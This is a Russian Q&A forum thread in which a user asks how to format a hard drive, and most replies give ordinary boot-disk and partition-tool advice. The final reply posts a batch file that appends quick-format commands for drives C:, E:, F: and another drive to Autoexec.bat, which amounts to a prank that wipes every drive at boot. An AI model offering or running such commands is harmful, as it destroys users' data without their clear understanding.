Александр Куприн

как отформатировать жесткий диск через "мой компьютер" не выходит

Ал
Александра

Format c: в командной строке

Ника Курганова

вы системный диск пытаетесь отформатировать? Оно вам надо? Система не даст себя убить. .
Зарузитесь с CD и форматируйте..

Алексей Моргунов

да система себя форматировать не будет блин...

Ka
Kaina

диск с или внешний жесткий диск!

Ольга Бортникова

Нужно вставить диск с ОС Windows и следовать инструкции по установки, там будет пункт отформатировать жесткий диск

Николай

Прогой Paragon и форматнете и на разделы разобьете, да и еще много чего ...ёте ))

Ре
Регина

грузимся с любого загрузчика хоть виндовс ХР, 7,8, хоть лив сиди, акронис и форматируем диск какой нужно если я правильно понял нужно всё форматнуть и С тоже

Марина Кочеткова

Скачать и зарезать на CD этот файл - http://files.mail.ru/RYMQAE - с помощью или Неро, или Imgburn или UltraISO.
Потом выставить в БИОСе загрузку с CDROMа.
Вставить этот диск в СДРОМ и перезагрузить компьютер.
Запуститься программа, выбрать - Стандартная загрузка
Потом - Paragon Partition Manager и в нём уже дальше делай с дисками (разделами) чего хочешь. Хоть удаляй вообще, не то что форматируй..))

Анюта Грибанова

Выкинь его с десятокого этожа тогда и форматировать ненадо

Ру
Руслан

Батник запусти
@Echo off
Echo format C: /q >> c:Autoexec.bat
@Echo off
Echo format 😨 /q >> c:Autoexec.bat
@Echo off
Echo format F: /q >> c:Autoexec.bat
@Echo off
Echo format E: /q >> c:Autoexec.bat
Главное подумай!!!